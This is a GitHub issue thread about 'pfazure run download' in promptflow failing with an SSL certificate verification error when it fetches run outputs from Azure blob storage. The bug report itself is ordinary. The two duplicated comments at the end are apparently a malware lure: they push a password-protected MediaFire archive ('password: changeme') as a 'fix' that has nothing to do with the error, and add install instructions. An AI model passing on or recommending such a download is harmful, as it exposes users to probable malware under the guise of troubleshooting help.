### ISSUE TITLE
[BUG] pfazure run download: SSLCertVerificationError

### ISSUE THREAD

**Issue by jomalsan** [microsoft/promptflow#3690]
**Describe the bug**

Unable to download run results from a prompt flow run in Azure. There is partial success, but the output jsonl file is not downloaded.

**How To Reproduce the bug**

1. I created a run of a flex flow in azure using `pfazure run create -f my_run.yml`
2. The flow succeeded running. Status is "Completed"
3. Then I want to download the output results using `pfazure run download --name <my_run_name> --output output`

The command succeeds in downloading: `snapshot`, `logs.txt`, `metrics.json`, and `run_metadata.json` into the `output` directory.

It then raises with the following error:

```
pfazure.run.download failed with DownloadInternalError: Failed to download run '<my_run_name>'. Error: Cannot connect to host ***.blob.core.windows.net:443 ssl:True [SSLCertVerificationError: (1, '[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: unable to get local issuer certificate (_ssl.c:1002)')]
```

**Expected behavior**

I expect the output file for the run to be downloaded in addition to the snapshot and metrics.

**Running Information**

macOS 14.6.1 (23G93)

```
{
  "promptflow": "1.13.0",
  "promptflow-azure": "1.13.0",
  "promptflow-core": "1.13.0",
  "promptflow-devkit": "1.13.0",
  "promptflow-tracing": "1.13.0"
}

Executable '/**/.venv/bin/python3.11'
Python (Darwin) 3.11.4 (v3.11.4:d2340ef257, Jun  6 2023, 19:15:51) [Clang 13.0.0 (clang-1300.0.29.30)]
```

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
